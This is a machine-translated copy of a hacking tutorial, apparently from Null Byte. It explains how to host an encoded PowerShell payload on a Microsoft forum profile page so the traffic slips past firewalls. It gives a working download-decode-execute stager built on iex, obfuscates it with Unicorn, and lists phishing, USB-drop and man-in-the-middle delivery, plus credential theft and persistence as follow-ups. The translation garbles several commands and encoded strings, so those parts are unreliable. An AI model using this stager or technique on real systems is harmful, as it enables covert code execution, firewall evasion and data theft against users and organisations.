قالب وردپرس درنا توس
Home / Tips and Tricks / Using Microsoft.com Domains to Bypass Firewalls and Run Payloads «Null Byte :: WonderHowTo

Using Microsoft.com Domains to Bypass Firewalls and Run Payloads «Null Byte :: WonderHowTo



Microsoft.com is one of the largest domains on the Internet with thousands of registered subdomains. Windows 10 pings these subdomains hundreds of times per hour, making it difficult to protect and monitor all operating system requirements through a firewall. An attacker could use these subdomains to provide payload data to evade network firewalls.

While I was recently trying to share an article on social media, I could not enter a simple PowerShell command into the tweet window. Twitter still received an error message stating that the tweet could not be sent.

In the past, hackers had tweeted PowerShell commands with the intent of using the service as a payload. Hosting system. This concept is not new and has led me to think about other popular domains that could be used in a similar way, as well as the potential benefits the activity might have for an attack.

Why use Microsoft domains instead of a dedicated VPS?

The most significant benefit would probably be the impact of these popular domains on network firewalls and high-security environments.

The concept is relatively simple. An attacker hosts his payload on a Microsoft domain. When a Windows 1

0 computer attempts to download it, hardened operating systems and networks are more likely to experience Web requests traversing the network and bypassing the firewall and an organization-established Intrusion Detection System (IDS).

Windows 10 computers can call home " up to tens of thousands of times a day". Even with hardened settings, Windows 10 pinges the Microsoft servers thousands of times. Some of the data transferred to and from Microsoft domains is required to maintain system updates and other important aspects of the operating system. The following is an example of wireshark collection of data leaving a Windows 10 system (GET).

Some Microsoft domains may appear with unusual subdomains (for example, "geover"). prod.do.dsp.mp.microsoft.com "). These are typically meant for dedicated services, resources, and applications that run in the background, which means that some strict firewalls and IDs can be used by these wildcard domains (e.g. For example, * .microsoft.com may allow the system to pass through the network, and some system administrators may also completely ignore Microsoft domains because malicious actors do not abuse them so often.

An attacker can use this knowledge to their advantage Take the following Wireshark image as an example: Do you notice anything unusual?

The domain was "social.msdn.microsoft.com" used only for downloading the attacker's payload For the naked eye – or for someone conducting Deep Packet Inspection (DPI) – this traffic looks mostly harmless The domain is part of the Microsoft community forum for developers and everyday Windows 10 users. The requirements (TCP / TLS) are encrypted, so that further checking of the packets does not show the complete path to the website or the contents (ie the user data). Administrators watching this traffic on the network probably believe that the target user is surfing the Microsoft forum.

When you navigate to the page set up by the attacker, you'll see the payload embedded in the About Me section.

Many types of Microsoft Domains can be used for this type of activity; These include Microsoft Answers, Office Forms, OneDrive, and even the comment sections of other Microsoft news agencies. All of these legitimate Microsoft domains allow user input that can be misused to host payloads.

Step 1: Create the payload

Here we define the last code bit that will be executed on the computer of the target. To simplify matters, the payload creates an empty text file named pwn_sauce in the Documents folder. Note the triple backslash ( \ ). In Bash (Kali terminal), this is required to pass PowerShell variables in the payload as a literal string.

  powershell -ep bypass / w 1 / C New Item ItemType File C:  Users \  $ env: USERNAME  Documents  pwn_sauce & # 39; 

PowerShell Uses the Workaround Execution Policy ( -ep ), while the terminal pop-ups remain hidden with / w 1 . A new file is created with the cmdlet New-Item . The file name path uses the username environment variable to automatically insert the username of the affected user. It can run on any Windows 10 computer without changing any part of the command. A new file is created in the "Documents " folder.

Simple commands like the one in the screenshot above can be directly embedded in the section About Me . Complex PowerShell Payloads that contain special characters must be base64 encoded. Otherwise, the Microsoft server will detect and clean up special characters (for example, < > &). Coding the payload is the quickest way around this problem, and you can do this in Kali Linux with the following command. Printf takes the payload and pipe ( | ) into the base64 command and the output should appear.

  ~ # printf & # 39;% s & # 39; "PAYLOAD GOES HERE" | base64

cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC93IDEgL0MgTmV3LUl0ZW0gLUl0ZW1UeXBlIGZpbGUgJ0M6
XFVzZXJzXCRlbnY6VVNFUk5BTUVcRG9jdW1lbnRzXHB3bl9zYXVjZSc = 

With extended commands, base64 is likely to produce multiple coded lines. If you are using PowerShell Base64 strings, they must appear in a single line. Concatenate the numerous lines into a single string by redirecting the base64 output to tr to delete new lines ( -d ) ( n ).

  ~ # printf & # 39;% s & # 39; "PAYLOAD GO HERE" | base64 | tr -d & # 39; n & # 39;

cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC93IDEgL0MgTmV3LUl0ZW0gLUl0ZW1UeXBlIGZpbGUgJ0M6XFVzZXJzXCRlbnY6VVNFUk5BT9BTgGJrGJ6VrGVrRRRRRRR and let's continue by creating the Microsoft account and setting up the Stager. 

Step 2: Create a Microsoft Account

A Microsoft account is required to create and modify the profile page where the payload is located. Navigate to the live login page to start the process.

After logging in to the user profile page, navigate to https: / /social.msdn.microsoft.com/Profile/USERNAME and click the "Edit My Profile" button to edit the section About Me .

Step 3: Host the Payload on the Microsoft Web Site

The About Me section on the Microsoft profile page may contain 1,024 characters. This should be considered when creating payload data, especially when encoding user data with base64, as this increases the number of characters. It would be possible to host payload data in plain text, but the stager would need to include code to recognize and purify hacked HTML strings back to plain text. This would be possible with PowerShell but would go beyond the scope of this article.

Add the Desired Payload to the section About Me between the words START and END . In the next step, the stager must parse all HTML code on the Microsoft side and look for coded strings between the "START" and "END" identifiers.

When done, click the "Save" button at the bottom of the page.

Step 4: Creating the Stager

The following PowerShell one-liners were developed to download the profile page of the Microsoft user, extract, decode, and then execute the encoded payload. [19659018] $ wro = iwr -Uri https://social.msdn.microsoft.com/Profile/USERNAME -UseBasicParsing; $ r = [Regex] :: new ("(? <= START) (. *) (? = END)"); $ m = $ r.Match ($ wro.rawcontent); if ($ m.Success) {$ p = [System.Text.Encoding] :: UTF8.GetString ([System.Convert] :: FromBase64String ($ m.value)); iex $ p}

There are several concatenated commands separated by semicolons. I will break down every command below.

  $ wro = iwr -Uri https://social.msdn.microsoft.com/Profile/USERNAME -UseBasicParsing; 

Above: The Invoke WebRequest () The iwr cmdlet retrieves the web page with the argument -UseBasicParsing . All this is specified in the variable $ wro (WebResponseObject). The no longer recommended UseBasicParsing parameter is used to enable basic parsing. I've noticed that this parameter must be set manually for the request to succeed.

  $ r = regex :: new ("(? <= START) (. *) (? = END)"); 

Above: PowerShell uses regex patterns to locate the payload in HTML code. There are other ways to use PowerShell to extract content from web pages, but this method has proven to be universal. Payloads embedded in START and END are filtered by this command.

  $ m = $ r.Match ($ wro.rawcontent); 

Above: Creates a variable $ m for each text that matches the regex patterns.

  if ($ m.Success) {$ p = System.Text.Encoding :: UTF8.GetString (System.Convert :: FromBase64String ($ m.value)); ...} 

Top: If patterns are found in the variable $ m decode ( FromBase64String ) the string and place it in the Variable $ p .

  iex $ p 

Above: Use Invoke Expression ( iex ) to execute the variable $ p . In this case, $ p is the PowerShell payload. For testing, the command iex can be replaced by the command echo (see below).

Step 5: Disguise the PowerShell Stager (Optional)

It may be desirable for an attacker to use a tool such as Unicorn veiled. For more information about Unicorn, see "To create an unrecognizable payload" on the GitHub page of the tool.

  ~ # python unicorn.py stager.ps1

, /
//
//
___ / | | //
`__ /  _ - (/ | ___ / - /
 |  _-  ___ __-_ `- / - / .
|  _-___, -  _____-- / _) & # 39; 
 -_ / __  (`(__`  |
` __ | | ) / (/ |
, ._____. & # 39; - // - |  | & # 39 /
/ __. , / /, --- |  /
/ / _.   `/` _ / _, & # 39; | |
| | (( |, /  & # 39; __ / & # 39; / | |
|   "-," _ / _ ------ ______ /  () /
| |   _. ,  ___ / 
| |  _   
   _   / 
   ._  __  _ | | 
  ___   | 
 __  __   _ |  |
|  _____  ____ | |
|   __ --- & # 39; .__  | | |
  __ --- /) |  /
  ____ / / () ( `---_ / |
 __________ / (, --__  _________. | ./ |
|  "---_  -,   _,. / |
|   _ ` /` ---_______- \ /
  .___, `| / \\ 
 |  _  |  (|: |
   | / / | ;
   (`_ & # 39;  |
.  .  `__ / | |
  .  | |
    ()
 |  | | |
|    I`
(__; (_; (& # 39; -_ & # 39 ;;
| ___   ___:  ___:

aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc =

Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @ TrustedSec, @HackingDave

[*] Exported Powershell output code in powershell_attack.txt 

Then cat the file "powershell_attack.txt" to find the veiled stager.

  ~ # cat powershell_attack.txt

Powershell / w 1 / C s "v ic -; s" "v tHL e" "c; s" "v NwW ((g" "v ic) .value. ToString () + (g "  "V tHL ) .value.toString ()); Power (g  "" v nww) .value.toString () (& # 39; JAB3AHIAbwAgAD0AIABpAHcAcgAgAC0AVQByAGkAIABoAHQAdABwAHMAOgAvAC8AcwBvAGMAaQBhAGwALgBtAHMAZABuAC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFAAcgBvAGYAaQBsAGUALwBVAFMARQBSAE4AQQBNAEUAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsAJAByACAAPQAgAFsAUgBlAGcAZQB4AF0AOgA6AG4AZQB3ACgAIgAoAD8APAA9AFMAVABBAFIAVAApACgALgAqACkAKAA / AD0ARQBOAEQAKQAiACkAOwAkAG0AIAA9ACAAJAByAC4ATQBhAHQAYwBoACgAJAB3AHIAbwAuAHIAYQB3AGMAbwBuAHQAZQBuAHQAKQA7AGkAZgAoACQAbQAuAFMAdQBjAGMAZQBzAHMAKQB7ACAAJABwACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAG0ALgB2AGEAbAB1AGUAKQApADsAaQBlAHgAIAAkAHAAIAB9AAoA & # 39) "[19659054] step 6: providing the Stagers 

The presented Stager w urde for a [194entwickeltundmitdiesemgetestet59038] USB Rubber Ducky. However, there are many other ways to run the code on the target computer. The following is a non-exhaustive list of possible attack vectors.

  • Man-in-the-Middle : Tools like Mitmf (now deprecated) and Bettercap can intercept downloads and replace them with malicious files.
  • Email Attachment : Phishing attacks are one of the most important ways an attacker tries to compromise an organization. Some organizations are too big to offer their staff a thorough safety awareness training, which makes this an effective technique.
  • USB Dead Drop : USB Drops have a pass rate of almost 50%. Many people may be fooled into inserting a random USB flash drive into their computer.
  • USB Rubber Ducky : With the USB Rubber Ducky, stagers can be physically accessed for several seconds on the target computer.

] Step 7: Improve the Attack (Conclusion)

An attacker can do much more to improve this attack.

Abuse of Google.com for Hosting Payload:

Using Google.com to host payloads is an improvement to the attack. As with * .microsoft.com, most firewalls do not block GET requests sent directly to google.com.

Hosting payload directly on Google is more difficult. Google is a search engine, so the attacker would need to take advantage of it by creating a website that Google can index. Then you would have to create a web path containing the payload as file name. The payload would later be captured by identifying the href and not the body of a section About Me (example below). The computer of the target would never query the website of the attacker. The payload would be completely captured using the Google search engine.

User data for the following purpose:

This article contained a very simple PowerShell payload that would use an empty text file in the Documents folder. , Realistically, an attacker could attempt to filter Wi-Fi passwords for establish persistence using tools such as schtasks or place an exe file in the StartUp folder.

However, if data exits the network, it does. It is likely to be a generic TCP reverse shell, which undermines the purpose of using a Microsoft or Google domain in the stager. In this case, it may be more desirable to use the target computer as a Wi-Fi hotspot and create an SMB share. Such attacks would allow an attacker to connect to the destination Wi-Fi hotspot (bypassing the source network) and plunder files on the computer.

SmartScreen Evasion:

SmartScreen is an additional layer of security developed by Microsoft. It runs in the background as an anti-malware service, while applications and files are scanned against a Microsoft malware database.

In my short round of testing (without Unicorn obfuscation), a compiled PowerShell Stager (EXE) Chrome bypassed the browser, Windows Defender, and Avast Antivirus on a slightly hardened Windows 10 computer. On the other hand, SmartScreen would prompt the user to manually run the EXE file as created by a " unknown publisher" (ie, the attacker). This article is about bypassing network firewalls. So we'll show you how to sign executables and bypass SmartScreen in the future.

Follow me @tokyoneon_ Here I will probably release more code to disrupt the detection of Twitter hackers. Please leave a comment if you have any questions.

Do not miss: Intercept and decrypt Windows passwords on a local network

Cover photo and screenshots of tokyoneon / zero byte

Source link